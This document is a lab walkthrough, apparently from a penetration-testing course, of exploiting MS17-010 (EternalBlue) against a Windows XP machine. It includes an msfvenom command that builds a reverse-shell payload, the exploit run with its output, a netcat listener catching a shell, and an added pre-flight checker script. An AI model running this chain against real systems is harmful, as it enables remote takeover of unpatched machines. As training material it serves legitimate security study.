Oh well. After spending several hours Googling and trying out exploits (namely 40279.py, 41987.py, 43980.rb and eternalblue_exploit7.py; check out the references at the end of the post), I found one that works. Get that script. In the exploit script it says:
Tested on:
– Windows 2016 x64
– Windows 10 Pro Build 10240 x64
– Windows 2012 R2 x64
– Windows 8.1 x64
– Windows 2008 R2 SP1 x64
– Windows 7 SP1 x64
– Windows 2008 SP1 x64
– Windows 2003 R2 SP2 x64
– Windows XP SP2 x64
– Windows 8.1 x86
– Windows 7 SP1 x86
– Windows 2008 SP1 x86
– Windows 2003 SP2 x86
– Windows XP SP3 x86
– Windows 2000 SP4 x86
Hooray. Now, before running that script, we need a couple of other things. You need a working version of impacket. Git clone the repository, then run pip install . in that directory. Incidentally, impacket also ships smbserver.py, a script which lets you stand up a quick SMB share for moving files to and from the target, a pain otherwise given that netcat isn't a Windows thing.
You also need one more prerequisite for the exploit: get mysmb.py and save it to the same directory as the exploit (it is imported as a plain module, so the directory matters). Otherwise, when running the exploit you'll encounter:
root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Traceback (most recent call last):
File "send_and_execute.py", line 3, in <module>
from mysmb import MYSMB
ImportError: No module named mysmb
Note that ms17-010.exe is the payload, which we generate with msfvenom:
root@Kali:~/PTP/2.5_Exploitation/Lab 4# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe
With the above I specified a reverse shell back to 192.168.1.73 on TCP 443, the x86 architecture (the target is 32-bit XP, which the exploit reports as Windows 5.1) and the Windows platform; EXITFUNC=thread makes the payload tear down only its own thread rather than the whole hosting process when the shell closes. Time to fire the exploit, after setting up the listener.
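Before firing, it is worth checking the two things this post trips over: the missing mysmb/impacket imports and the payload architecture (an x64 exe sent to a 32-bit XP box will never connect back). The script below is an added example, not code from the original post or from the MS17-010 exploit repository. It confirms impacket is importable and mysmb.py sits next to the exploit, then parses the PE header of the msfvenom output to confirm the Machine field matches the target's architecture. The script name, the --exploit-dir and --target-arch flags, and the minimal_pe_header fixture are assumptions of this example.

```python
#!/usr/bin/env python3
"""Pre-flight checks before firing send_and_execute.py.

Added example, not code from the original post or from the MS17-010
exploit repository. Checks that impacket and mysmb.py can be found from
the exploit directory and that the msfvenom payload is a PE built for
the target's architecture (x86 here: Windows 5.1 is 32-bit XP).
"""
import argparse
import importlib.util
import os
import struct
import sys

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification.
MACHINE_I386 = 0x014C
MACHINE_AMD64 = 0x8664
MACHINE_NAMES = {MACHINE_I386: "x86", MACHINE_AMD64: "x64"}


def pe_machine(data):
    """Return the Machine field of a PE image, or None if data is not a PE.

    Layout: 'MZ' at offset 0, e_lfanew (u32 LE) at 0x3C, 'PE\\0\\0' at
    e_lfanew, then IMAGE_FILE_HEADER whose first field is Machine (u16 LE).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return machine


def minimal_pe_header(machine):
    """Constructed test fixture: the smallest byte string pe_machine accepts."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew points right after the DOS header
    return bytes(hdr) + b"PE\0\0" + struct.pack("<H", machine)


def payload_arch(path):
    """'x86', 'x64', or None for the executable at path."""
    with open(path, "rb") as f:
        return MACHINE_NAMES.get(pe_machine(f.read()))


def missing_prereqs(exploit_dir):
    """Names of the imports send_and_execute.py needs that cannot be found.

    impacket must be pip-installed; mysmb.py must sit next to the exploit,
    since the exploit does a plain 'from mysmb import MYSMB'.
    """
    missing = []
    if importlib.util.find_spec("impacket") is None:
        missing.append("impacket")
    if not os.path.isfile(os.path.join(exploit_dir, "mysmb.py")):
        missing.append("mysmb")
    return missing


def preflight(exploit_dir, payload, target_arch):
    """List of human-readable problems; an empty list means go ahead and fire."""
    problems = ["cannot import %s" % m for m in missing_prereqs(exploit_dir)]
    if not os.path.isfile(payload):
        problems.append("payload %s does not exist" % payload)
        return problems
    arch = payload_arch(payload)
    if arch is None:
        problems.append("payload %s is not a PE executable" % payload)
    elif arch != target_arch:
        problems.append("payload is %s but target is %s" % (arch, target_arch))
    return problems


def main(argv):
    p = argparse.ArgumentParser(description="pre-flight checks for send_and_execute.py")
    p.add_argument("payload", help="exe produced by msfvenom")
    p.add_argument("--exploit-dir", default=".", help="directory holding send_and_execute.py")
    p.add_argument("--target-arch", default="x86", choices=("x86", "x64"))
    args = p.parse_args(argv)
    problems = preflight(args.exploit_dir, args.payload, args.target_arch)
    for msg in problems:
        print("[-] " + msg)
    if not problems:
        print("[+] prerequisites satisfied, payload is %s" % args.target_arch)
    return 1 if problems else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it from the exploit directory as `python3 preflight.py ms17-010.exe --target-arch x86` and only start the listener and exploit once it exits 0. The Machine check reads only the COFF header, so it works on any PE msfvenom emits regardless of template or encoder.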
root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Trying to connect to 192.168.1.207:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x89ee6a88
SESSION: 0xe24add20
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1efcf10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1efcfb0
overwriting token UserAndGroups
Sending file EF6I56.exe...
Opening SVCManager on 192.168.1.207.....
Creating service XQBG.....
Starting service XQBG.....
The NETBIOS connection with the remote host timed out.
Removing service XQBG.....
ServiceExec Error on: 192.168.1.207
nca_s_proto_error
Done
The timeout on "Starting service" and the trailing ServiceExec error are expected rather than a sign of failure: the payload is a plain executable, not a service binary, so it never reports a status back to the Service Control Manager, the start call times out and the follow-up RPC calls fail with nca_s_proto_error, but by then the process is already running. If successful we get a shell at our listener:
root@Kali:~/PTP/2.5_Exploitation/Lab 4# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.73] from (UNKNOWN) [192.168.1.207] 1129
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.